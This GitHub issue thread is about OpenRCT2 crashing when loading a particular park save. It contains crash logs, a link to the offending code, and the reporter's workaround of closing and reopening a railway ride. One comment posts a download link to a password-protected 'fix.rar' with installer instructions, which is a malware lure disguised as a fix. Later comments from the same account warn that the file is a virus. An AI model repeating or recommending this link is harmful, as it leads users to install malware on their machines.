### ISSUE TITLE
Crash when loading park on MacOS and Windows

### ISSUE THREAD

**Issue by Harry-Hopkinson** [OpenRCT2/OpenRCT2#22632]
### Operating System

MacOS Sonoma 14.6.1 and Windows 11

### OpenRCT2 build

OpenRCT2, v0.4.13 (53cb740 on develop)

### Base game

RollerCoaster Tycoon 2, RollerCoaster Tycoon Classic

### Describe the issue

I had been playing this save for a few hours with no issues but then it suddenly crashed and whenever I load back into the save it continues crashing. @fidwell confirms that this crash also occurs on Windows 11 as well as MacOS Sonoma 14.6.1.

Curiously after testing if you pause the game it will not crash, it only crashes once you resume it.

### Steps to reproduce

1. Open the attached park file.
2. Observe a crash after a second or so.

### Attachments

[The park](https://drive.google.com/file/d/1uM1TsVc3-_0IEpZ-FRWDJjUwY_Youkbm/view?usp=drive_link)

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Harry-Hopkinson** [comment]
Just loaded the park on my linux machine and can observe logs when it crashes.

```
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!
ERROR[/__w/OpenRCT2/OpenRCT2/src/openrct2/ride/Vehicle.cpp:8945 (GetCar)]: Tried to get non-existent car from index!

segmentation fault
```

**Comment by Harry-Hopkinson** [comment]
Which exists in the lines

https://github.com/OpenRCT2/OpenRCT2/blob/dff7d3a930c81c1de4a41c7a4338f4bdafc7ff5d/src/openrct2/ride/Vehicle.cpp#L8937C1-L8950C2

**Comment by Harry-Hopkinson** [comment]
Subsequent testing shows that this save was crashing due to the Railway. I closed the ride and then reopened it and that seemed to fix the crashing.

**Comment by MinecraftEarthVillage** [comment]
不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.

**Comment by MinecraftEarthVillage** [comment]
不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
